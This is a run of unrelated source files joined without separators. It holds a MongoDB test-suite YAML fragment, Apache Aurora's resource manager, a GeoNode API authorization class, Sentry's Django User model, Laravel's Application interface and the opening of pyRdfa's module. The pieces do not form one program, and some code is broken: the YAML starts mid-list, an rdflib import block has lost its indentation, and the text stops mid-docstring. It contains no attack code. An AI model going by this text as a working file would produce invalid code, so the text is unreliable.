  - "change_streams.mongos_passthrough"
  - "change_streams.secondary_reads"
  - "change_streams.disable_write_noops"
  - "change_streams.base_eval"
eval:
  - "change_streams.secondary_reads_eval"
  - "change_streams.whole_cluster_eval"
excludes:
  - "change_streams.mongos_passthrough_excludes"
  - "change_streams.secondary_reads_excludes"
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import threading
from mesos.interface import mesos_pb2
from twitter.common.metrics import LambdaGauge
from apache.aurora.executor.common.status_checker import (
StatusChecker,
StatusCheckerProvider,
StatusResult
)
from apache.aurora.executor.common.task_info import mesos_task_instance_from_assigned_task
from apache.thermos.monitoring.monitor import TaskMonitor
from apache.thermos.monitoring.resource import TaskResourceMonitor
class ResourceManager(StatusChecker):
  """ Manage resources consumed by a Task """
  def __init__(self, resources, resource_monitor):
    """
      resources: Resources object specifying cpu, ram, disk limits for the task
      resource_monitor: The ResourceMonitor to monitor resources
    """
    self._resource_monitor = resource_monitor
    # TODO(wickman) Remove cpu/ram reporting if MESOS-1458 is resolved.
    self._max_cpu = resources.cpu().get()
    self._max_ram = resources.ram().get()
    self._max_disk = resources.disk().get()
    # NOTE(review): _kill_reason is never read or written again in this
    # class — presumably consumed by a collaborator; confirm before removing.
    self._kill_reason = None
    self._kill_event = threading.Event()
  @property
  def _num_procs(self):
    """ Total number of processes the task consists of (including child processes) """
    return self._resource_monitor.sample()[1].num_procs
  @property
  def _ps_sample(self):
    """ ProcessSample representing the aggregate resource consumption of the Task's processes """
    return self._resource_monitor.sample()[1].process_sample
  @property
  def _disk_sample(self):
    """ Integer in bytes representing the disk consumption in the Task's sandbox """
    return self._resource_monitor.sample()[1].disk_usage
  @property
  def status(self):
    # Only the disk limit is enforced here; cpu/ram are reported as metrics
    # but not killed on (see the MESOS-1458 TODO above).
    sample = self._disk_sample
    if sample > self._max_disk:
      self._kill_event.set()
      return StatusResult('Disk limit exceeded. Reserved %s bytes vs used %s bytes.' % (
          self._max_disk, sample), mesos_pb2.TASK_FAILED)
    # Implicitly returns None while under the limit — presumably the
    # StatusChecker contract treats None as "healthy"; confirm upstream.
  def name(self):
    # Identifier under which this checker's metrics/status are reported.
    return 'resource_manager'
  def register_metrics(self):
    # Gauges sample lazily on scrape via the lambdas below. The *_percent
    # gauges divide by the reserved amounts, which assumes non-zero
    # cpu/ram/disk reservations.
    self.metrics.register(LambdaGauge('disk_used', lambda: self._disk_sample))
    self.metrics.register(LambdaGauge('disk_reserved', lambda: self._max_disk))
    self.metrics.register(LambdaGauge('disk_percent',
        lambda: 1.0 * self._disk_sample / self._max_disk))
    self.metrics.register(LambdaGauge('cpu_used', lambda: self._ps_sample.rate))
    self.metrics.register(LambdaGauge('cpu_reserved', lambda: self._max_cpu))
    self.metrics.register(LambdaGauge('cpu_percent',
        lambda: 1.0 * self._ps_sample.rate / self._max_cpu))
    self.metrics.register(LambdaGauge('ram_used', lambda: self._ps_sample.rss))
    self.metrics.register(LambdaGauge('ram_reserved', lambda: self._max_ram))
    self.metrics.register(LambdaGauge('ram_percent',
        lambda: 1.0 * self._ps_sample.rss / self._max_ram))
  def start(self):
    # Start the checker, expose the gauges, then begin sampling resources.
    super(ResourceManager, self).start()
    self.register_metrics()
    self._resource_monitor.start()
class ResourceManagerProvider(StatusCheckerProvider):
  """Builds a ResourceManager status checker for an assigned Mesos task."""
  def __init__(self, checkpoint_root, **resource_monitor_options):
    self._checkpoint_root = checkpoint_root
    self._resource_monitor_options = resource_monitor_options
  def from_assigned_task(self, assigned_task, sandbox):
    # Pull the declared resource limits from the task configuration.
    task_resources = mesos_task_instance_from_assigned_task(
        assigned_task).task().resources()
    monitor = TaskResourceMonitor(
        assigned_task.taskId,
        TaskMonitor(self._checkpoint_root, assigned_task.taskId),
        **self._resource_monitor_options)
    return ResourceManager(task_resources, monitor)
from tastypie.authorization import DjangoAuthorization
from tastypie.exceptions import Unauthorized
from guardian.shortcuts import get_objects_for_user
class GeoNodeAuthorization(DjangoAuthorization):
    """Object-level API authorization backed by GeoNode's granular
    permission system."""

    def read_list(self, object_list, bundle):
        # Restrict the queryset to resources the requesting user may view.
        viewable_ids = get_objects_for_user(
            bundle.request.user,
            'base.view_resourcebase').values('id')
        return object_list.filter(id__in=viewable_ids)

    def read_detail(self, object_list, bundle):
        resource = bundle.obj.get_self_resource()
        return bundle.request.user.has_perm('view_resourcebase', resource)

    def create_list(self, object_list, bundle):
        # TODO implement if needed
        raise Unauthorized()

    def create_detail(self, object_list, bundle):
        resource = bundle.obj.get_self_resource()
        return bundle.request.user.has_perm('add_resourcebase', resource)

    def update_list(self, object_list, bundle):
        # TODO implement if needed
        raise Unauthorized()

    def update_detail(self, object_list, bundle):
        resource = bundle.obj.get_self_resource()
        return bundle.request.user.has_perm('change_resourcebase', resource)

    def delete_list(self, object_list, bundle):
        # TODO implement if needed
        raise Unauthorized()

    def delete_detail(self, object_list, bundle):
        resource = bundle.obj.get_self_resource()
        return bundle.request.user.has_perm('delete_resourcebase', resource)
from __future__ import absolute_import
import logging
import warnings
from bitfield import BitField
from django.contrib.auth.signals import user_logged_out
from django.contrib.auth.models import AbstractBaseUser, UserManager
from django.core.urlresolvers import reverse
from django.dispatch import receiver
from django.db import IntegrityError, models, transaction
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from sentry.db.models import BaseManager, BaseModel, BoundedAutoField, sane_repr
from sentry.models import LostPasswordHash
from sentry.utils.http import absolute_uri
audit_logger = logging.getLogger("sentry.audit.user")
# NOTE(review): this class deliberately shadows the imported Django
# ``UserManager`` name, mixing Sentry's BaseManager with Django's manager.
class UserManager(BaseManager, UserManager):
    def get_from_teams(self, organization_id, teams):
        """Return active users who are active members of any of ``teams``
        within the organization identified by ``organization_id``."""
        return User.objects.filter(
            sentry_orgmember_set__organization_id=organization_id,
            sentry_orgmember_set__organizationmemberteam__team__in=teams,
            sentry_orgmember_set__organizationmemberteam__is_active=True,
            is_active=True,
        )

    def get_from_projects(self, organization_id, projects):
        """
        Returns users associated with a project based on their teams.
        """
        return User.objects.filter(
            sentry_orgmember_set__organization_id=organization_id,
            sentry_orgmember_set__organizationmemberteam__team__projectteam__project__in=projects,
            sentry_orgmember_set__organizationmemberteam__is_active=True,
            is_active=True,
        )
class User(BaseModel, AbstractBaseUser):
    """Sentry's user account model, persisted in the legacy ``auth_user``
    table.

    Built on Django's ``AbstractBaseUser`` with ``username`` as the
    authentication field; ``name`` holds the full display name and is
    stored in the legacy ``first_name`` column.
    """

    __core__ = True

    id = BoundedAutoField(primary_key=True)
    username = models.CharField(_("username"), max_length=128, unique=True)
    # this column is called first_name for legacy reasons, but it is the entire
    # display name
    name = models.CharField(_("name"), max_length=200, blank=True, db_column=u"first_name")
    email = models.EmailField(_("email address"), blank=True, max_length=75)
    is_staff = models.BooleanField(
        _("staff status"),
        default=False,
        help_text=_("Designates whether the user can log into this admin " "site."),
    )
    is_active = models.BooleanField(
        _("active"),
        default=True,
        help_text=_(
            "Designates whether this user should be treated as "
            "active. Unselect this instead of deleting accounts."
        ),
    )
    is_superuser = models.BooleanField(
        _("superuser status"),
        default=False,
        help_text=_(
            "Designates that this user has all permissions without " "explicitly assigning them."
        ),
    )
    is_managed = models.BooleanField(
        _("managed"),
        default=False,
        help_text=_(
            "Designates whether this user should be treated as "
            "managed. Select this to disallow the user from "
            "modifying their account (username, password, etc)."
        ),
    )
    is_sentry_app = models.NullBooleanField(
        _("is sentry app"),
        null=True,
        default=None,
        help_text=_(
            "Designates whether this user is the entity used for Permissions"
            "on behalf of a Sentry App. Cannot login or use Sentry like a"
            "normal User would."
        ),
    )
    is_password_expired = models.BooleanField(
        _("password expired"),
        default=False,
        help_text=_(
            "If set to true then the user needs to change the " "password on next sign in."
        ),
    )
    last_password_change = models.DateTimeField(
        _("date of last password change"),
        null=True,
        help_text=_("The date the password was changed last."),
    )
    flags = BitField(
        flags=(
            (u"newsletter_consent_prompt", u"Do we need to ask this user for newsletter consent?"),
        ),
        default=0,
        null=True,
    )
    # Rotated on logout to invalidate other sessions (see refresh_session_nonce).
    session_nonce = models.CharField(max_length=12, null=True)
    date_joined = models.DateTimeField(_("date joined"), default=timezone.now)
    last_active = models.DateTimeField(_("last active"), default=timezone.now, null=True)

    objects = UserManager(cache_fields=[u"pk"])

    USERNAME_FIELD = "username"
    REQUIRED_FIELDS = ["email"]

    class Meta:
        app_label = "sentry"
        db_table = "auth_user"
        verbose_name = _("user")
        verbose_name_plural = _("users")

    __repr__ = sane_repr("id")

    def delete(self):
        """Delete the account and its avatar; the reserved "sentry" user
        cannot be removed."""
        if self.username == "sentry":
            raise Exception('You cannot delete the "sentry" user as it is required by Sentry.')
        avatar = self.avatar.first()
        if avatar:
            avatar.delete()
        return super(User, self).delete()

    def save(self, *args, **kwargs):
        """Persist the user, defaulting ``username`` to ``email`` when unset."""
        if not self.username:
            self.username = self.email
        return super(User, self).save(*args, **kwargs)

    def has_perm(self, perm_name):
        # Deprecated permission hook: superusers implicitly have every permission.
        warnings.warn("User.has_perm is deprecated", DeprecationWarning)
        return self.is_superuser

    def has_module_perms(self, app_label):
        # Deprecated permission hook: superusers implicitly have every permission.
        warnings.warn("User.has_module_perms is deprecated", DeprecationWarning)
        return self.is_superuser

    def get_unverified_emails(self):
        """Return the queryset of this user's unverified email addresses."""
        return self.emails.filter(is_verified=False)

    def get_verified_emails(self):
        """Return the queryset of this user's verified email addresses."""
        return self.emails.filter(is_verified=True)

    def has_unverified_emails(self):
        return self.get_unverified_emails().exists()

    def get_label(self):
        # Best available human-readable identifier, falling back to the pk.
        return self.email or self.username or self.id

    def get_display_name(self):
        return self.name or self.email or self.username

    def get_full_name(self):
        return self.name

    def get_short_name(self):
        return self.username

    def get_salutation_name(self):
        """Return a capitalized first name, derived from the username's local
        part (before '@' and '.') when no display name is set."""
        name = self.name or self.username.split("@", 1)[0].split(".", 1)[0]
        first_name = name.split(" ", 1)[0]
        return first_name.capitalize()

    def get_avatar_type(self):
        avatar = self.avatar.first()
        if avatar:
            return avatar.get_avatar_type_display()
        return "letter_avatar"

    def send_confirm_email_singular(self, email, is_new_user=False):
        """Send a confirmation message for one email record, refreshing its
        validation hash first if it is stale."""
        from sentry import options
        from sentry.utils.email import MessageBuilder

        if not email.hash_is_valid():
            email.set_hash()
            email.save()

        context = {
            "user": self,
            "url": absolute_uri(
                reverse("sentry-account-confirm-email", args=[self.id, email.validation_hash])
            ),
            "confirm_email": email.email,
            "is_new_user": is_new_user,
        }
        msg = MessageBuilder(
            subject="%sConfirm Email" % (options.get("mail.subject-prefix"),),
            template="sentry/emails/confirm_email.txt",
            html_template="sentry/emails/confirm_email.html",
            type="user.confirm_email",
            context=context,
        )
        msg.send_async([email.email])

    def send_confirm_emails(self, is_new_user=False):
        """Send a confirmation message for every unverified address."""
        email_list = self.get_unverified_emails()
        for email in email_list:
            self.send_confirm_email_singular(email, is_new_user)

    def merge_to(from_user, to_user):
        """Move all of ``from_user``'s relations onto ``to_user``.

        NOTE: defined without ``self``; the bound receiver plays the role of
        ``from_user``, i.e. call as ``from_user.merge_to(to_user)``.
        """
        # TODO: we could discover relations automatically and make this useful
        from sentry import roles
        from sentry.models import (
            Activity,
            AuditLogEntry,
            AuthIdentity,
            Authenticator,
            GroupAssignee,
            GroupBookmark,
            GroupSeen,
            GroupShare,
            GroupSubscription,
            Identity,
            OrganizationMember,
            OrganizationMemberTeam,
            UserAvatar,
            UserEmail,
            UserOption,
        )

        audit_logger.info(
            "user.merge", extra={"from_user_id": from_user.id, "to_user_id": to_user.id}
        )

        for obj in OrganizationMember.objects.filter(user=from_user):
            try:
                with transaction.atomic():
                    obj.update(user=to_user)
            # this will error if both users are members of obj.org
            except IntegrityError:
                pass

            # identify the highest priority membership
            # only applies if both users are members of obj.org
            # if roles are different, grants combined user the higher of the two
            to_member = OrganizationMember.objects.get(
                organization=obj.organization_id, user=to_user
            )
            if roles.get(obj.role).priority > roles.get(to_member.role).priority:
                to_member.update(role=obj.role)

            for team in obj.teams.all():
                try:
                    with transaction.atomic():
                        OrganizationMemberTeam.objects.create(
                            organizationmember=to_member, team=team
                        )
                # this will error if both users are on the same team in obj.org,
                # in which case, no need to update anything
                except IntegrityError:
                    pass

        model_list = (
            Authenticator,
            GroupAssignee,
            GroupBookmark,
            GroupSeen,
            GroupShare,
            GroupSubscription,
            Identity,
            UserAvatar,
            UserEmail,
            UserOption,
        )

        for model in model_list:
            for obj in model.objects.filter(user=from_user):
                try:
                    with transaction.atomic():
                        obj.update(user=to_user)
                except IntegrityError:
                    pass

        Activity.objects.filter(user=from_user).update(user=to_user)
        # users can be either the subject or the object of actions which get logged
        AuditLogEntry.objects.filter(actor=from_user).update(actor=to_user)
        AuditLogEntry.objects.filter(target_user=from_user).update(target_user=to_user)

        # remove any SSO identities that exist on from_user that might conflict
        # with to_user's existing identities (only applies if both users have
        # SSO identities in the same org), then pass the rest on to to_user
        AuthIdentity.objects.filter(
            user=from_user,
            auth_provider__organization__in=AuthIdentity.objects.filter(user=to_user).values(
                "auth_provider__organization"
            ),
        ).delete()
        AuthIdentity.objects.filter(user=from_user).update(user=to_user)

    def set_password(self, raw_password):
        """Set the password, record the change time, and clear the
        password-expired flag."""
        super(User, self).set_password(raw_password)
        self.last_password_change = timezone.now()
        self.is_password_expired = False

    def refresh_session_nonce(self, request=None):
        """Rotate the 12-character session nonce; when ``request`` is given,
        mirror the new value into ``request.session``."""
        from django.utils.crypto import get_random_string

        self.session_nonce = get_random_string(12)
        if request is not None:
            request.session["_nonce"] = self.session_nonce

    def get_orgs(self):
        """Return the visible organizations this user is a member of."""
        from sentry.models import Organization, OrganizationMember, OrganizationStatus

        return Organization.objects.filter(
            status=OrganizationStatus.VISIBLE,
            id__in=OrganizationMember.objects.filter(user=self).values("organization"),
        )

    def get_orgs_require_2fa(self):
        """Return the user's visible organizations whose flags require 2FA."""
        from sentry.models import Organization, OrganizationStatus

        return Organization.objects.filter(
            flags=models.F("flags").bitor(Organization.flags.require_2fa),
            status=OrganizationStatus.VISIBLE,
            member_set__user=self,
        )

    def clear_lost_passwords(self):
        """Delete any outstanding password-recovery hashes for this user."""
        LostPasswordHash.objects.filter(user=self).delete()
# HACK(dcramer): last_login needs nullable for Django 1.8
User._meta.get_field("last_login").null = True


# When a user logs out, we want to always log them out of all
# sessions and refresh their nonce.
@receiver(user_logged_out, sender=User)
def refresh_user_nonce(sender, request, user, **kwargs):
    # The signal can fire without an authenticated user (e.g. an anonymous
    # session); nothing to rotate in that case.
    if user is None:
        return
    user.refresh_session_nonce()
    # Persist only the nonce column; rotating it is what invalidates the
    # user's other sessions.
    user.save(update_fields=["session_nonce"])
<?php
namespace Illuminate\Contracts\Foundation;
use Illuminate\Contracts\Container\Container;
/**
 * Contract for the Laravel application instance.
 *
 * Extends the service container with filesystem path accessors,
 * environment introspection, maintenance-mode checks, and the
 * service-provider registration / bootstrap / termination lifecycle.
 */
interface Application extends Container
{
    /**
     * Get the version number of the application.
     *
     * @return string
     */
    public function version();

    /**
     * Get the base path of the Laravel installation.
     *
     * @param  string  $path
     * @return string
     */
    public function basePath($path = '');

    /**
     * Get the path to the bootstrap directory.
     *
     * @param  string  $path
     * @return string
     */
    public function bootstrapPath($path = '');

    /**
     * Get the path to the application configuration files.
     *
     * @param  string  $path
     * @return string
     */
    public function configPath($path = '');

    /**
     * Get the path to the database directory.
     *
     * @param  string  $path
     * @return string
     */
    public function databasePath($path = '');

    /**
     * Get the path to the language files.
     *
     * @param  string  $path
     * @return string
     */
    public function langPath($path = '');

    /**
     * Get the path to the public directory.
     *
     * @param  string  $path
     * @return string
     */
    public function publicPath($path = '');

    /**
     * Get the path to the resources directory.
     *
     * @param  string  $path
     * @return string
     */
    public function resourcePath($path = '');

    /**
     * Get the path to the storage directory.
     *
     * @param  string  $path
     * @return string
     */
    public function storagePath($path = '');

    /**
     * Get or check the current application environment.
     *
     * @param  string|array  ...$environments
     * @return string|bool
     */
    public function environment(...$environments);

    /**
     * Determine if the application is running in the console.
     *
     * @return bool
     */
    public function runningInConsole();

    /**
     * Determine if the application is running unit tests.
     *
     * @return bool
     */
    public function runningUnitTests();

    /**
     * Determine if the application is running with debug mode enabled.
     *
     * @return bool
     */
    public function hasDebugModeEnabled();

    /**
     * Get an instance of the maintenance mode manager implementation.
     *
     * @return \Illuminate\Contracts\Foundation\MaintenanceMode
     */
    public function maintenanceMode();

    /**
     * Determine if the application is currently down for maintenance.
     *
     * @return bool
     */
    public function isDownForMaintenance();

    /**
     * Register all of the configured providers.
     *
     * @return void
     */
    public function registerConfiguredProviders();

    /**
     * Register a service provider with the application.
     *
     * @param  \Illuminate\Support\ServiceProvider|string  $provider
     * @param  bool  $force
     * @return \Illuminate\Support\ServiceProvider
     */
    public function register($provider, $force = false);

    /**
     * Register a deferred provider and service.
     *
     * @param  string  $provider
     * @param  string|null  $service
     * @return void
     */
    public function registerDeferredProvider($provider, $service = null);

    /**
     * Resolve a service provider instance from the class name.
     *
     * @param  string  $provider
     * @return \Illuminate\Support\ServiceProvider
     */
    public function resolveProvider($provider);

    /**
     * Boot the application's service providers.
     *
     * @return void
     */
    public function boot();

    /**
     * Register a new boot listener.
     *
     * @param  callable  $callback
     * @return void
     */
    public function booting($callback);

    /**
     * Register a new "booted" listener.
     *
     * @param  callable  $callback
     * @return void
     */
    public function booted($callback);

    /**
     * Run the given array of bootstrap classes.
     *
     * @param  array  $bootstrappers
     * @return void
     */
    public function bootstrapWith(array $bootstrappers);

    /**
     * Get the current application locale.
     *
     * @return string
     */
    public function getLocale();

    /**
     * Get the application namespace.
     *
     * @return string
     *
     * @throws \RuntimeException
     */
    public function getNamespace();

    /**
     * Get the registered service provider instances if any exist.
     *
     * @param  \Illuminate\Support\ServiceProvider|string  $provider
     * @return array
     */
    public function getProviders($provider);

    /**
     * Determine if the application has been bootstrapped before.
     *
     * @return bool
     */
    public function hasBeenBootstrapped();

    /**
     * Load and boot all of the remaining deferred providers.
     *
     * @return void
     */
    public function loadDeferredProviders();

    /**
     * Set the current application locale.
     *
     * @param  string  $locale
     * @return void
     */
    public function setLocale($locale);

    /**
     * Determine if middleware has been disabled for the application.
     *
     * @return bool
     */
    public function shouldSkipMiddleware();

    /**
     * Register a terminating callback with the application.
     *
     * @param  callable|string  $callback
     * @return \Illuminate\Contracts\Foundation\Application
     */
    public function terminating($callback);

    /**
     * Terminate the application.
     *
     * @return void
     */
    public function terminate();
}
# -*- coding: utf-8 -*-
"""
RDFa 1.1 parser, also referred to as a “RDFa Distiller”. It is
deployed, via a CGI front-end, on the U{W3C RDFa 1.1 Distiller page<http://www.w3.org/2012/pyRdfa/>}.
For details on RDFa, the reader should consult the U{RDFa Core 1.1<http://www.w3.org/TR/rdfa-core/>}, U{XHTML+RDFa1.1<http://www.w3.org/TR/2010/xhtml-rdfa>}, and the U{RDFa 1.1 Lite<http://www.w3.org/TR/rdfa-lite/>} documents.
The U{RDFa 1.1 Primer<http://www.w3.org/TR/rdfa-primer/>} may also prove helpful.
This package can also be downloaded U{from GitHub<https://github.com/RDFLib/pyrdfa3>}. The
distribution also includes the CGI front-end and a separate utility script to be run locally.
Note that this package is an updated version of a U{previous RDFa distiller<http://www.w3.org/2007/08/pyRdfa>} that was developed
for RDFa 1.0. Although it reuses large portions of that code, it has been quite thoroughly rewritten, hence put in a completely
different project. (The version numbering has been continued, though, to avoid any kind of misunderstandings. This version has version numbers "3.0.0" or higher.)
(Simple) Usage
==============
From a Python file, expecting a Turtle output::
from pyRdfa import pyRdfa
print pyRdfa().rdf_from_source('filename')
Other output formats are also possible. E.g., to produce RDF/XML output, one could use::
from pyRdfa import pyRdfa
print pyRdfa().rdf_from_source('filename', outputFormat='pretty-xml')
It is also possible to embed an RDFa processing. Eg, using::
from pyRdfa import pyRdfa
graph = pyRdfa().graph_from_source('filename')
returns an RDFLib.Graph object instead of a serialization thereof. See the the description of the
L{pyRdfa class<pyRdfa.pyRdfa>} for further possible entry points details.
There is also, as part of this module, a L{separate entry for CGI calls<processURI>}.
Return (serialization) formats
------------------------------
The package relies on RDFLib. By default, it relies therefore on the serializers coming with the local RDFLib distribution. However, there has been some issues with serializers of older RDFLib releases; also, some output formats, like JSON-LD, are not (yet) part of the standard RDFLib distribution. A companion package, called pyRdfaExtras, is part of the download, and it includes some of those extra serializers. The extra format (not part of the RDFLib core) is U{JSON-LD<http://json-ld.org/spec/latest/json-ld-syntax/>}, whose 'key' is 'json', when used in the 'parse' method of an RDFLib graph.
Options
=======
The package also implements some optional features that are not part of the RDFa recommendations. At the moment these are:
- possibility for plain literals to be normalized in terms of white spaces. Default: false. (The RDFa specification requires keeping the white spaces and leave applications to normalize them, if needed)
- inclusion of embedded RDF: Turtle content may be enclosed in a C{script} element and typed as C{text/turtle}, U{defined by the RDF Working Group<http://www.w3.org/TR/turtle/>}. Alternatively, some XML dialects (e.g., SVG) allows the usage of RDF/XML as part of their core content to define metadata in RDF. For both of these cases pyRdfa parses these serialized RDF content and adds the resulting triples to the output Graph. Default: true.
- extra, built-in transformers are executed on the DOM tree prior to RDFa processing (see below). These transformers can be provided by the end user.
Options are collected in an instance of the L{Options} class and may be passed to the processing functions as an extra argument. E.g., to allow the inclusion of embedded content::
from pyRdfa.options import Options
options = Options(embedded_rdf=True)
print pyRdfa(options=options).rdf_from_source('filename')
See the description of the L{Options} class for the details.
Host Languages
==============
RDFa 1.1. Core is defined for generic XML; there are specific documents to describe how the generic specification is applied to
XHTML and HTML5.
pyRdfa makes an automatic switch among these based on the content type of the source as returned by an HTTP request. The following are the
possible host languages:
- if the content type is C{text/html}, the content is HTML5
- if the content type is C{application/xhtml+xml} I{and} the right DTD is used, the content is XHTML1
- if the content type is C{application/xhtml+xml} and no or an unknown DTD is used, the content is XHTML5
- if the content type is C{application/svg+xml}, the content type is SVG
 - if the content type is C{application/atom+xml}, the content type is Atom
- if the content type is C{application/xml} or C{application/xxx+xml} (but 'xxx' is not 'atom' or 'svg'), the content type is XML
If local files are used, pyRdfa makes a guess on the content type based on the file name suffix: C{.html} is for HTML5, C{.xhtml} for XHTML1, C{.svg} for SVG, anything else is considered to be general XML. Finally, the content type may be set by the caller when initializing the L{pyRdfa class<pyRdfa.pyRdfa>}.
Beyond the differences described in the RDFa specification, the main difference is the parser used to parse the source. In the case of HTML5, pyRdfa uses an U{HTML5 parser<http://code.google.com/p/html5lib/>}; for all other cases the simple XML parser, part of the core Python environment, is used. This may be significant in the case of erroneous sources: indeed, the HTML5 parser may do adjustments on
the DOM tree before handing it over to the distiller. Furthermore, SVG is also recognized as a type that allows embedded RDF in the form of RDF/XML.
See the variables in the L{host} module if a new host language is added to the system. The current host language information is available for transformers via the option argument, too, and can be used to control the effect of the transformer.
Vocabularies
============
RDFa 1.1 has the notion of vocabulary files (using the C{@vocab} attribute) that may be used to expand the generated RDF graph. Expansion is based on some very simply RDF Schema and OWL statements on sub-properties and sub-classes, and equivalences.
pyRdfa implements this feature, although it does not do this by default. The extra C{vocab_expansion} parameter should be used for this extra step, for example::
from pyRdfa.options import Options
options = Options(vocab_expansion=True)
print pyRdfa(options=options).rdf_from_source('filename')
The triples in the vocabulary files themselves (i.e., the small ontology in RDF Schema and OWL) are removed from the result, leaving the inferred property and type relationships only (additionally to the “core” RDF content).
Vocabulary caching
------------------
By default, pyRdfa uses a caching mechanism instead of fetching the vocabulary files each time their URI is met as a C{@vocab} attribute value. (This behavior can be switched off setting the C{vocab_cache} option to false.)
Caching happens in a file system directory. The directory itself is determined by the platform the tool is used on, namely:
- On Windows, it is the C{pyRdfa-cache} subdirectory of the C{%APPDATA%} environment variable
- On MacOS, it is the C{~/Library/Application Support/pyRdfa-cache}
- Otherwise, it is the C{~/.pyRdfa-cache}
This automatic choice can be overridden by the C{PyRdfaCacheDir} environment variable.
Caching can be set to be read-only, i.e., the setup might generate the cache files off-line instead of letting the tool writing its own cache when operating, e.g., as a service on the Web. This can be achieved by making the cache directory read only.
If the directories are neither readable nor writable, the vocabulary files are retrieved via HTTP every time they are hit. This may slow down processing, it is advised to avoid such a setup for the package.
The cache includes a separate index file and a file for each vocabulary file. Cache control is based upon the C{EXPIRES} header of a vocabulary file’s HTTP return header: when first seen, this data is stored in the index file and controls whether the cache has to be renewed or not. If the HTTP return header does not have this entry, the date is artificially set to the current date plus one day.
(The cache files themselves are dumped and loaded using U{Python’s built in cPickle package<http://docs.python.org/release/2.7/library/pickle.html#module-cPickle>}. These are binary files. Care should be taken if they are managed by CVS: they must be declared as binary files when adding them to the repository.)
RDFa 1.1 vs. RDFa 1.0
=====================
Unfortunately, RDFa 1.1 is I{not} fully backward compatible with RDFa 1.0, meaning that, in a few cases, the triples generated from an RDFa 1.1 source are not the same as for RDFa 1.0. (See the separate U{section in the RDFa 1.1 specification<http://www.w3.org/TR/rdfa-core/#major-differences-with-rdfa-syntax-1.0>} for some further details.)
This distiller’s default behavior is RDFa 1.1. However, if the source includes, in the top element of the file (e.g., the C{html} element) a C{@version} attribute whose value contains the C{RDFa 1.0} string, then the distiller switches to a RDFa 1.0 mode. (Although the C{@version} attribute is not required in RDFa 1.0, it is fairly commonly used.) Similarly, if the RDFa 1.0 DTD is used in the XHTML source, it will be taken into account (a very frequent setup is that an XHTML file is defined with that DTD and is served as text/html; pyRdfa will consider that file as XHTML5, i.e., parse it with the HTML5 parser, but interpret the RDFa attributes under the RDFa 1.0 rules).
Transformers
============
The package uses the concept of 'transformers': the parsed DOM tree is possibly
transformed I{before} performing the real RDFa processing. This transformer structure makes it possible to
add additional 'services' without distorting the core code of RDFa processing.
A transformer is a function with three arguments:
- C{node}: a DOM node for the top level element of the DOM tree
- C{options}: the current L{Options} instance
- C{state}: the current L{ExecutionContext} instance, corresponding to the top level DOM Tree element
The function may perform any type of change on the DOM tree; the typical behaviour is to add or remove attributes on specific elements. Some transformations are included in the package and can be used as examples; see the L{transform} module of the distribution. These are:
- The C{@name} attribute of the C{meta} element is copied into a C{@property} attribute of the same element
- Interpreting the 'openid' references in the header. See L{transform.OpenID} for further details.
- Implementing the Dublin Core dialect to include DC statements from the header. See L{transform.DublinCore} for further details.
The user of the package may refer add these transformers to L{Options} instance. Here is a possible usage with the “openid” transformer added to the call::
from pyRdfa.options import Options
from pyRdfa.transform.OpenID import OpenID_transform
options = Options(transformers=[OpenID_transform])
print pyRdfa(options=options).rdf_from_source('filename')
@summary: RDFa parser (distiller)
@requires: Python version 2.5 or up; 2.7 is preferred
@requires: U{RDFLib<http://rdflib.net>}; version 3.X is preferred.
@requires: U{html5lib<http://code.google.com/p/html5lib/>} for the HTML5 parsing.
@requires: U{httpheader<http://deron.meranda.us/python/httpheader/>}; however, a small modification had to make on the original file, so for this reason and to make distribution easier this module (single file) is added to the package.
@organization: U{World Wide Web Consortium<http://www.w3.org>}
@author: U{Ivan Herman<a href="http://www.w3.org/People/Ivan/">}
@license: This software is available for use under the
U{W3C® SOFTWARE NOTICE AND LICENSE<href="http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231">}
@copyright: W3C
@var builtInTransformers: List of built-in transformers that are to be run regardless, because they are part of the RDFa spec
@var CACHE_DIR_VAR: Environment variable used to define cache directories for RDFa vocabularies in case the default setting does not work or is not appropriate.
@var rdfa_current_version: Current "official" version of RDFa that this package implements by default. This can be changed at the invocation of the package
@var uri_schemes: List of registered (or widely used) URI schemes; used for warnings...
"""
"""
$Id: __init__.py,v 1.91 2013-10-16 11:48:54 ivan Exp $
"""
__version__ = "3.4.3"
__author__ = 'Ivan Herman'
__contact__ = 'Ivan Herman, ivan@w3.org'
__license__ = 'W3C® SOFTWARE NOTICE AND LICENSE, http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231'

import sys
PY3 = (sys.version_info[0] >= 3)

# Python 2/3 compatibility imports. BUG FIX: both branches previously imported
# the Python 3 module (`io` / `urllib.parse`), which defeated the PY3 switch
# and broke the Python 2 fallback; the else branches now use the Python 2
# module locations (`StringIO` / `urlparse`).
if PY3 :
    from io import StringIO
else :
    from StringIO import StringIO

import os
import xml.dom.minidom

if PY3 :
    from urllib.parse import urlparse
else :
    from urlparse import urlparse
import rdflib
from rdflib import URIRef
from rdflib import Literal
from rdflib import BNode
from rdflib import Namespace
if rdflib.__version__ >= "3.0.0" :
from rdflib import RDF as ns_rdf
from rdflib import RDFS as ns_rdfs
from rdflib import Graph
else :
from rdflib.RDFS import RDFSNS as ns_rdfs
from rdflib.RDF import RDFNS as ns_rdf
from rdflib.Graph import Graph
import logging
# Module-level logger for the pyRdfa package.
logger = logging.getLogger(__name__)

# Namespace, in the RDFLib sense, for the rdfa vocabulary
ns_rdfa = Namespace("http://www.w3.org/ns/rdfa#")

from .extras.httpheader import acceptable_content_type, content_type
from .transform.prototype import handle_prototypes

# Vocabulary terms for vocab reporting
RDFA_VOCAB = ns_rdfa["usesVocabulary"]

# Namespace, in the RDFLib sense, for the XSD Datatypes
ns_xsd = Namespace('http://www.w3.org/2001/XMLSchema#')

# Namespace, in the RDFLib sense, for the distiller vocabulary, used as part of the processor graph
ns_distill = Namespace("http://www.w3.org/2007/08/pyRdfa/vocab#")

# Module-level debug switch.
debug = False
#########################################################################################################
# Exception/error handling. Essentially, all the different exceptions are re-packaged into
# separate exception class, to allow for an easier management on the user level
class RDFaError(Exception) :
    """Superclass of exceptions representing error conditions defined by the
    RDFa 1.1 specification. The message is stored on ``msg``; no other
